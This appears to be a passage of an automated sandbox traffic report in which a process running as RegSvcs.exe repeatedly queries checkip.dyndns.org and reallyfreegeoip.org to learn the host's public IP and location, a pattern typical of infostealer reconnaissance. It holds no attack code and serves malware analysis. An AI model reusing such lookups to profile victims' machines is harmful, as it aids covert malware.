Dec 18, 2024 13:45:37.865587950 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b3284a6149caa70866e0798eceac71cc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49846	132.226.247.73	80	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:39.675235033 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 13:45:41.274636984 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 33e31b87ed7ef720606b44c6c49ed277 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	104.21.67.152	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:44:48 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:44:48 UTC	872	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:44:48 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514657 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xv4yqNVd06AihWQTsxN1edGvqPRMQ8tdD2PaTFh5A4Viu5muJPhWSB9ahfhOBzZZSP3pOU660rsHB9icQBev0F2mllaa1ODpIebxG2FAGeLApaLJWfbiQmkJ1QtBCqWS%2BWmaBg0M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3f14d9e10f4f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1497&rtt_var=572&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1897335&cwnd=239&unsent_bytes=0&cid=bdd3111a3b80efd8&ts=546&x=0"
2024-12-18 12:44:48 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	104.21.67.152	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:44:50 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-18 12:44:51 UTC	890	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:44:50 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514659 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y26rIkqZou%2Biv%2BJ1%2F1QQojBVIDZmzHHgLt%2B5u4QlC059J%2FurLAM%2FxCYhBvPsX3toZ9Aljqiogn3Rie3t%2B%2FhTgquVFR4F9NPKCnM%2FGUAnKEKS5sXYXhi2czqUSGuR2fjzL5qvJ2%2FR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3f21f87980cd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1476&rtt_var=561&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1937624&cwnd=178&unsent_bytes=0&cid=76dc0b4412de891c&ts=453&x=0"
2024-12-18 12:44:51 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	104.21.67.152	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:44:53 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:44:54 UTC	873	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:44:53 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514662 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pmtssWCtLmUFmIQInfNXRQB49MNnpKdaIo1X2Du2TJtJgrSTvjjWYRbR3cBkV0GfvIUWuRiIKN%2BpCjiu0%2Bob9BRqDuB59MpvqOGCiigExETfRNvz5bK43sgE1LdwNxA1kvue1Qz1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3f355897c35e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1504&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1907250&cwnd=59&unsent_bytes=0&cid=ba253636f1288020&ts=451&x=0"
2024-12-18 12:44:54 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49722	104.21.67.152	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:44:56 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-18 12:44:57 UTC	874	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:44:57 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514666 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nuWaR3vIbMoW7ZORrrDeM99c6WUxxlZhFEYXWB2TeQQ5688rFzwW%2Fs53D73VnqH9EcQCOjaHAbKkRtw%2BeMDemvaeVd20euREnOsDOxLnredSIZUOgijBxVafbIJJ8AovVxjOfm5z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3f4968848c1b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1977&rtt_var=759&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1425085&cwnd=210&unsent_bytes=0&cid=38fd033b738aa89f&ts=461&x=0"
2024-12-18 12:44:57 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49730	104.21.67.152	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:00 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:45:00 UTC	876	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:00 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514669 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w9Qm1%2FANEn5MrUguW1cjmUrcNaKyHZHu0UP9R7A4QFMDfz2DCP80g%2BUjtGbr%2FNJuZMo304OB9PibagineIxkeM3lvtheGqLSgVo8cFlBAyekzyIkkUL1G6mukhDHYbC6qsazWinw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3f5cc92f42b0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2035&min_rtt=2022&rtt_var=786&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1368963&cwnd=233&unsent_bytes=0&cid=84ebd5386904997f&ts=463&x=0"
2024-12-18 12:45:00 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49755	104.21.67.152	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:10 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:45:10 UTC	869	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514679 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vPNYc5LmWwpxH1gGpMgDWBDs7dLTfSJRPVJMzODZwonbUHzZbTA24GfIjdyyohdIbvBHWxw9VdYdw2bgyqFwZvQTPlGswbAWMT7VtH4V4l36qoznry426rGFkXYkxzRSwZk4MxvZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3f9caa1b0c7c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1525&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1914754&cwnd=76&unsent_bytes=0&cid=16a7ad88112c2ec6&ts=457&x=0"
2024-12-18 12:45:10 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49775	104.21.67.152	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:17 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:45:18 UTC	872	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:17 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514686 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SVcjuHqnm8FQGqcJwPAl379H%2FgZ1IsoRzyX0dtoZu9k6wBs4W9pPdQgMQG9hfmOetvf5kOM9Lnd9lHaHYGUvxc7T86GnziPoVFOBgfLMMdDEY9B1xZe72Jt5xT9nBxjRuKAMGe4a"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3fcadcde9e08-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1903&min_rtt=1829&rtt_var=739&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1596500&cwnd=163&unsent_bytes=0&cid=a66171212d7faa05&ts=455&x=0"
2024-12-18 12:45:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49776	104.21.67.152	443	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:18 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:45:18 UTC	884	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514687 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUx2aKZFCBagxru%2FQ3sY2uZ7T5P2HyG8T%2FBZPm%2FJgptYsr10YFhUZsae%2FjSQAcHrSasEPjFiC8CfuUH8itLrfy6siQln4XHAgOq5JMiRpyL1%2FoXLxL%2B3poSG8fSwLtfj5eii%2Fghb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3fcfe920422b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1603&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1803582&cwnd=220&unsent_bytes=0&cid=e6af152f6e1ab445&ts=452&x=0"
2024-12-18 12:45:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49783	104.21.67.152	443	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:20 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-18 12:45:20 UTC	884	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514689 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZOd%2FsGfUBRiURBclsNJ2SUX915Jj1kjUpJXJ5jTp63UcRQbpK8%2FE2OWnxwq%2Flm30YH5cCJ9AW3nev2AR3ef2dsnrL1pZ7bSaBNiTISL5b%2FU6SEpmjPqYNA%2BF7UnG6afGt%2B3%2BJP6P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3fdcfb220dc7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1884&rtt_var=718&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1512953&cwnd=211&unsent_bytes=0&cid=af4197731992613c&ts=451&x=0"
2024-12-18 12:45:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
